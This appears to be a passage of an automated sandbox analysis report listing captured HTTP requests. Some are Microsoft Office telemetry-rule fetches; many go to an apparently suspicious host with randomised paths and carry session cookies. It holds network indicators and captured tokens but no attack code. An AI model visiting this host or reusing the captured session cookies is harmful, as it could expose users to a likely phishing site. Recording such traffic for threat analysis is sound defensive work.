laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /yzl90gnm1KLEmoCR6qHjMHCqo8f9r3opwID50ldIh3nZl4A90173 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /bcZi5xLDaE5HSnMwzOs2nqEiNRjI64TDL9YoYgStZo05C31IfL5bA4X3ZxCg1DmtUfCPc7A4DU3ncS8xQ46WymneSnYPdSfafDmzsDiTo4dPOH0RZ8MChM5iBMY2SuaZY77EyMDDIoLQvd3UlmAKOJ8jNjk3WjtsDNqlcd670 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /wxbzLihqqHn3mripsOT5Db20HBaopsjMFehCA0C8VtI12123 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /mnehY4yqqFrD60BTLfVjR0Zav2TfuvKMrVqdygPxhqFJZP9m78143 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opDv0BklCs5PNU9b6kPW69FghgkrYCdzwOe1ACSAZpnGdcd194 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrLIE9HxPvWyxwe52DVNXAeftBrvSjmXcTL9WGgs3Q67140 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ij9B1srBpWG7PktmXozMpAfjAkXX9fqf4mnIUavaF4cJBACQ12RVF2ht1Sw1U4ef208 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrS5DHMtUFf3KT9q8ukN4yHvZJtYoxvAk1stcbB3pNrz0Hq2DA5aIDTTrAw3yMylkGVojua19Ref240 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klQjXXsK6UHY13vEvfc0gBMyW0bvmYMRYrXBcdip5HMwaBOlPuWhUBBahVqb78170 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvAvGkzUPzYsrtIeQrJV34vxwRhrm3BqumnX33aAUDQoDsHJYfhlRDVlUqepnfFM0vJef260 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://asix.jiitimeztcw.es/bujbweowymidvpirvohtjrbtetlu0x4cq6xwjf6gr49t73wgbrr5kmm?OWCUIGCRRKVCBZBKHDNRMAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /yzl90gnm1KLEmoCR6qHjMHCqo8f9r3opwID50ldIh3nZl4A90173 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opDv0BklCs5PNU9b6kPW69FghgkrYCdzwOe1ACSAZpnGdcd194 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
